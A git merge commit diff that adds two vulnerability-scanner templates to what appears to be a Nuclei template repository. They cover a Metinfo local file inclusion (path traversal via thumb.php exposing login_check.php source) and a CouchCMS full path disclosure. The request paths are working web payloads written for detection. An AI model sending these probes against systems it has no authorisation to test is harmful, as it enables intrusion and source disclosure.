Merge branch 'projectdiscovery:master' into master

2022-04-11 15:06:37 -05:00 · 2022-04-11 15:06:37 -05:00 · 74635f0e12
parent 96704d7fc2 eed7c2ac7c
commit 74635f0e12
3 changed files with 58 additions and 9 deletions
--- a/.new-additions
+++ b/.new-additions
@ -1,9 +1,2 @@
-cves/2015/CVE-2015-3897.yaml
-cves/2022/CVE-2022-22954.yaml
-cves/2022/CVE-2022-28363.yaml
-cves/2022/CVE-2022-28365.yaml
-default-logins/apache/dubbo-admin-default-login.yaml
-vulnerabilities/other/hanming-lfr.yaml
-vulnerabilities/other/tongda-session-disclosure.yaml
-vulnerabilities/other/unauth-rlm.yaml
-vulnerabilities/other/yongyou-u8-oa-sqli.yaml
+cnvd/2018/CNVD-2018-13393.yaml
+cves/2018/CVE-2018-7662.yaml
--- a/cnvd/2018/CNVD-2018-13393.yaml
+++ b/cnvd/2018/CNVD-2018-13393.yaml
@ -0,0 +1,24 @@
+id: CNVD-2018-13393
+
+info:
+  name: Metinfo LFI
+  author: ritikchaddha
+  severity: high
+  reference: https://paper.seebug.org/676/
+  tags: metinfo,cnvd,cvnd2018,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<?php"
+          - "login_met_cookie($metinfo_admin_name);"
+        condition: and
--- a/cves/2018/CVE-2018-7662.yaml
+++ b/cves/2018/CVE-2018-7662.yaml
@ -0,0 +1,32 @@
+id: CVE-2018-7662
+
+info:
+  name: CouchCMS Full Path Disclosure
+  author: ritikchaddha
+  severity: medium
+  description: phpmailer.php and mysql2i.func.php disclosure the full path
+  reference: https://github.com/CouchCMS/CouchCMS/issues/46
+  tags: couchcms,fpd,cve,cve2018
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php"
+      - "{{BaseURL}}/addons/phpmailer/phpmailer.php"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "mysql2i.func.php on line 10"
+          - "Fatal error: Cannot redeclare mysql_affected_rows() in"
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - "phpmailer.php on line 10"
+          - "Fatal error: Call to a menber function add_event_listener() on a non-object in"
+        condition: and